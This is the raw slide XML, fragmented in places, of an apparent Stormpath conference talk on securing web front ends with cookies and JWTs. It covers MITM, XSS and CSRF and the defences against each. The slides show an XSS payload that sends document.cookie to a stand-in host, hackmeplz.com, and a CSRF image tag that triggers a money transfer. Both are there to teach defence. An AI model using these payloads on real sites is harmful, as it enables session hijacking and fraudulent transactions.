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77" r:id="rId2"/>
    <p:sldId id="381" r:id="rId3"/>
    <p:sldId id="371" r:id="rId4"/>
    <p:sldId id="290" r:id="rId5"/>
    <p:sldId id="289" r:id="rId6"/>
    <p:sldId id="343" r:id="rId7"/>
    <p:sldId id="292" r:id="rId8"/>
    <p:sldId id="344" r:id="rId9"/>
    <p:sldId id="299" r:id="rId10"/>
    <p:sldId id="300" r:id="rId11"/>
    <p:sldId id="301" r:id="rId12"/>
    <p:sldId id="320" r:id="rId13"/>
    <p:sldId id="303" r:id="rId14"/>
    <p:sldId id="304" r:id="rId15"/>
    <p:sldId id="305" r:id="rId16"/>
    <p:sldId id="346" r:id="rId17"/>
    <p:sldId id="294" r:id="rId18"/>
    <p:sldId id="295" r:id="rId19"/>
    <p:sldId id="364" r:id="rId20"/>
    <p:sldId id="340" r:id="rId21"/>
    <p:sldId id="348" r:id="rId22"/>
    <p:sldId id="349" r:id="rId23"/>
    <p:sldId id="341" r:id="rId24"/>
    <p:sldId id="297" r:id="rId25"/>
    <p:sldId id="350" r:id="rId26"/>
    <p:sldId id="296" r:id="rId27"/>
    <p:sldId id="367" r:id="rId28"/>
    <p:sldId id="306" r:id="rId29"/>
    <p:sldId id="307" r:id="rId30"/>
    <p:sldId id="308" r:id="rId31"/>
    <p:sldId id="309" r:id="rId32"/>
    <p:sldId id="313" r:id="rId33"/>
    <p:sldId id="314" r:id="rId34"/>
    <p:sldId id="342" r:id="rId35"/>
    <p:sldId id="357" r:id="rId36"/>
    <p:sldId id="316" r:id="rId37"/>
    <p:sldId id="322" r:id="rId38"/>
    <p:sldId id="352" r:id="rId39"/>
    <p:sldId id="325" r:id="rId40"/>
    <p:sldId id="356" r:id="rId41"/>
    <p:sldId id="327" r:id="rId42"/>
    <p:sldId id="328" r:id="rId43"/>
    <p:sldId id="329" r:id="rId44"/>
    <p:sldId id="333" r:id="rId45"/>
    <p:sldId id="372" r:id="rId46"/>
    <p:sldId id="334" r:id="rId47"/>
    <p:sldId id="373" r:id="rId48"/>
    <p:sldId id="374" r:id="rId49"/>
    <p:sldId id="375" r:id="rId50"/>
    <p:sldId id="376" r:id="rId51"/>
    <p:sldId id="383" r:id="rId52"/>
    <p:sldId id="384" r:id="rId53"/>
    <p:sldId id="385" r:id="rId54"/>
    <p:sldId id="378" r:id="rId55"/>
    <p:sldId id="359" r:id="rId56"/>
    <p:sldId id="360" r:id="rId57"/>
    <p:sldId id="361" r:id="rId58"/>
    <p:sldId id="363" r:id="rId59"/>
    <p:sldId id="377" r:id="rId60"/>
    <p:sldId id="379" r:id="rId61"/>
    <p:sldId id="369" r:id="rId62"/>
    <p:sldId id="380" r:id="rId63"/>
    <p:sldId id="368" r:id="rId64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9CEF2"/>
    <a:srgbClr val="9EC0E1"/>
    <a:srgbClr val="142F84"/>
    <a:srgbClr val="102361"/>
    <a:srgbClr val="114DFA"/>
    <a:srgbClr val="1A35B8"/>
    <a:srgbClr val="2C5BF2"/>
    <a:srgbClr val="0F1D68"/>
    <a:srgbClr val="4DAF71"/>
    <a:srgbClr val="5F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4" autoAdjust="0"/>
    <p:restoredTop sz="86418" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="105" d="100"/>
          <a:sy n="105" d="100"/>
        </p:scale>
        <p:origin x="-2384" y="-328"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="1296"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="26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16" y="-72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0C2F6-885F-4A0B-AF85-F3450FB47DD3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A24D6-251B-407E-82E1-7D4FFC215B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E9BF1-D0ED-43A4-AA4C-A2A9E8879F74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F763-C6E4-440E-B509-1FF5BDD97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5626" y="0"/>
            <a:ext cx="9149626" cy="6868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B5F272-8705-D240-B86A-0579F7912F93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E0510B-836D-954D-A244-02A1CE6C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97014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73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no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9670" cy="62221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0" y="6380924"/>
            <a:ext cx="1859278" cy="360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HelveticaNeueLT Pro 65 Md"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="HelveticaNeueLT Pro 65 Md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6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4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about/appsecurity/learning/xss/%23StoredX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Cross-Site_Request_Forgery_(CSRF" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_polic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yapp.com/transferMoney?to=BadGuy&amp;amount=100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674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ormpath/express-stormpath-angular-sample-project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00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00/api/profile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stormpath.com/register" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:support@stormpath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5" y="6040223"/>
            <a:ext cx="3040915" cy="589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95400"/>
            <a:ext cx="8305800" cy="22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200" spc="120" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 35 Th"/>
                <a:cs typeface="HelveticaNeueLT Pro 35 Th"/>
              </a:rPr>
              <a:t>Building Secure User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="5200" spc="120" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 35 Th"/>
                <a:cs typeface="HelveticaNeueLT Pro 35 Th"/>
              </a:rPr>
              <a:t>Interfaces With JWTs (JSON Web Tokens)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343400"/>
            <a:ext cx="9144000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Robert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0" err="1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Damphousse</a:t>
            </a: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 @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0" err="1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robertjd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
                <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" spc="100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
              <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
            </a:endParaRPr>
          </a:p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Lead Front-End Developer, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" spc="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HelveticaNeueLT Pro 45 Lt"/>
                <a:cs typeface="HelveticaNeueLT Pro 45 Lt"/>
              </a:rPr>
              <a:t>Stormpath</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22598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2" y="1048786"/>
            <a:ext cx="8352788" cy="5181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Securing User Credentials: Session ID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This is OK if you protect your cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> Session  User identity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Use a web framework like Apache Shiro or Spring Security to assert security rules, roles stored in a database.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3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Session ID Problems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They’re opaque and have no meaning themselves (they’re just ‘pointers’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t> l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ook up server state on *every request*.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cannot be used for inter-op with other services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JWTs can help with this, but we’ll still use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Cookies,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>The Right Way ®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0030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Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>, The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>Right Way 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Cookies can be easily compromised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Man-in-the-Middle (MITM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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Cross-Site Request Forgery (CSRF)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7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Man In The Middle (MITM)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Someone ‘listening on the wire’ between the browser and server can see and copy the cookie.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HTTPS/TLS everywhere a cookie will be in transit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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> flag on 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Cross-Site Scripting (XSS)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8833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 very REAL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Happens when someone else can execute code inside your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Can be used to steal your cookies!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https://www.owasp.org/index.php/XSS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7789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https://www.google.com/about/appsecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>/xss/#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>StoredXSS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3954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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2015-05-12 at 8.49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181100"/>
            <a:ext cx="6654800" cy="448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Left Arrow 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18846732">
            <a:off x="5413217" y="3442036"/>
            <a:ext cx="1600200" cy="685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19200"/>
            <a:ext cx="5638800" cy="563880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04800" y="457200"/>
            <a:ext cx="8305800" cy="4830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en-US" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>Slideshare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" smtClean="0"/>
              <a:t> URL:   http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" err="1"/>
              <a:t>goo.gl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="50" dirty="0" err="1"/>
              <a:t>kXOpgs</a:t>
            </a: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298836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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="Screen Shot 2015-05-12 at 8.4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502400" cy="4991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 descr="Screen Shot 2015-05-12 at 8.4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781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362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&lt;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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>(function(){</a:t>
            </a:r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a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>('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')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400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>a.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>https:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hackmeplz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"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latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>yourCookies.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/?cookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>’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+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> a}())"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681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 what if I put this in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>chatbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>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9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GET https:/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hackmeplz.com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yourCookies.png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cookies=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SessionID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=123412341234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Your browser is going to make this request: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Which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>means..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4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2 at 8.4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781800" cy="3390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37178"/>
            <a:ext cx="8458200" cy="50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Escape Content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Server-side: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 well-known, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>trusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> libraries to ensure dynamic HTML does not contain executable code.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Do NOT roll your own.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>Client Side</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>scape user input from forms (some frameworks do this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>automatically, read docs!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81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Use HTTPS-Only cookies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the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> flag on your authentication cookies.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HttpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>are NOT accessible by the JavaScript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71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 this definitive guide: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https://www.owasp.org/index.php/XSS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7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Cross-Site Request Forgery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(CSRF)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1111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Exploits the fact that HTML tags do NOT follow the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>when making GET requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean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://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF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https://developer.mozilla.org/en-US/docs/Web/Security/Same-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>origin_policy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 Attacker puts malicious image into a web page that the user visits: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“https://myapp.com/transferMoney?to=BadGuy&amp;amount=10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>”/&gt;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 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20" dirty="0"/>
              <a:t>About </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="120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Full-stack developer 10 years</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Full-stack with JavaScript since 2011 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Node.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + Angular)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Currently leading JavaScript at Stormpath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Cross-Site Request Forgery (CSRF)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browser complies, “The request is going to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, so I’ll happily send along your cookies for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myapp.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>!”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Your server trusts the cookies AND the user it identifies, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>and transfers the money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Solutions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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Synchronizer Token (for form-based apps)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Double-Submit Cookie (for modern apps)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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header check (for extra measure)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Double Submit Cookie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client two cookies: (1) Session ID and (2) a strong random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Client sends back the random value in a custom HTTP header, triggering the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Same-Origin-Policy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95300"/>
            <a:ext cx="9029700" cy="55245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495800" y="3048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5029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79400"/>
            <a:ext cx="89535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CORS Warning!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BEWARE OF THIS ADVICE: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Access-Control-Allow-Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>: *</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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400" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Access-Control-Allow-Headers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 smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="5715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3200" b="1" dirty="0"/>
              <a:t>DISABLES SAME-ORIGIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>POLICY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Origin Header check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Browsers send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> header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Tells your server where the request is coming from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Cannot be modified by JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CAN be modified by a malicious HTTP Proxy (use HTTPS!)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588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At Last..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Token Authentication!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16154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9906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r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>We’re about to go from here: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771" y="3134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51054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r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0"/>
              <a:t>..to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90800"/>
            <a:ext cx="23114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4600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3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Token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1" smtClean="0"/>
              <a:t>Auth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t> – All you need to know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Authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is proving who you are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token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a way of persisting that proof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JSON Web Tokens (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>s) are a token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JWTs are often used for the access token and refresh token in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Oauth2 workflows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553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120" dirty="0" smtClean="0"/>
              <a:t>About Stormpath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581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spc="50" dirty="0" smtClean="0"/>
              <a:t>Cloud-based User Identity API for Developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0"/>
              <a:t>Authentication and Authorization as-as-service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" err="1" smtClean="0"/>
              <a:t>RESTful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="50" dirty="0" smtClean="0"/>
              <a:t> API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Active Directory, LDAP, and SAML Integration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Private Deployments (AWS)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Free plan for developers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" spc="50" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="vertical_v1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91414"/>
            <a:ext cx="5715000" cy="899786"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="logo-spring-high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21" y="5029200"/>
            <a:ext cx="68580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5029200"/>
            <a:ext cx="51959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5029200"/>
            <a:ext cx="68580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JWTs are fun – let’s go!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a: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0863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 the wild they look like just another ugly string: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540150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58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eyJ0eXAiOiJKV1QiLA0KICJhbGciOiJIUzI1NiJ9.eyJ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>pc3MiOiJqb2UiLA0KICJleHAiOjEzMDA4MTkzODAsDQo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>gImh0dHA6Ly9leGFtcGxlLmNvbS9pc19yb290Ijp0cnV</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lfQ.dBjftJeZ4CVPmB92K27uhbUJU1p1r_wW1gFWFOEj</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Xk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206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they do have a three part structure.  Each part is a Base64-URL encoded string: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3657600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eyJ0eXAiOiJKV1QiLA0KICJhb</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>GciOiJIUzI1NiJ9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eyJpc3MiOiJqb2UiLA0KICJle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HAiOjEzMDA4MTkzODAsDQogIm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>h0dHA6Ly9leGFtcGxlLmNvbS9</a:t>
